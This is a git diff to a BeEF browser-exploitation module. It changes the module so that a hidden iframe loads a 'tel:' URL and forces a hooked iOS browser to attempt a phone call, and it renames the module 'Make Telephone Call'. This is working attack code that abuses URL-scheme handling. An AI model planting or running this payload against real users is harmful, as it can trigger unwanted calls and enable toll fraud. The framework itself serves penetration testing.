diff --git a/modules/host/iphone_tel/command.js b/modules/host/iphone_tel/command.js
index fd270eeee..4d34a95c2 100644
--- a/modules/host/iphone_tel/command.js
+++ b/modules/host/iphone_tel/command.js
@@ -14,7 +14,8 @@
// limitations under the License.
//
beef.execute(function() {
- document.body.innerHTML = "";
+ var sploit = beef.dom.createInvisibleIframe();
+ sploit.src = 'tel:<%= @tel_num %>';
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=IFrame Created!");
});
diff --git a/modules/host/iphone_tel/config.yaml b/modules/host/iphone_tel/config.yaml
index d7d64c786..e1d6fd0d8 100644
--- a/modules/host/iphone_tel/config.yaml
+++ b/modules/host/iphone_tel/config.yaml
@@ -18,8 +18,8 @@ beef:
iphone_tel:
enable: true
category: "Host"
- name: "Make Skype Call (Tel)"
- description: "This module will force the browser to attempt a skype call. It will exploit the insecure handling of URL schemes in iOS.
The protocol handler used will be: tel"
+ name: "Make Telephone Call"
+ description: "This module will force the browser to attempt a telephone call in iOS. It will exploit the insecure handling of URL schemes in iOS.
The protocol handler used will be: tel"
authors: ["xntrik", "Nitesh Dhanjani"]
target:
- working: ['S']
+ user_notify: ['S']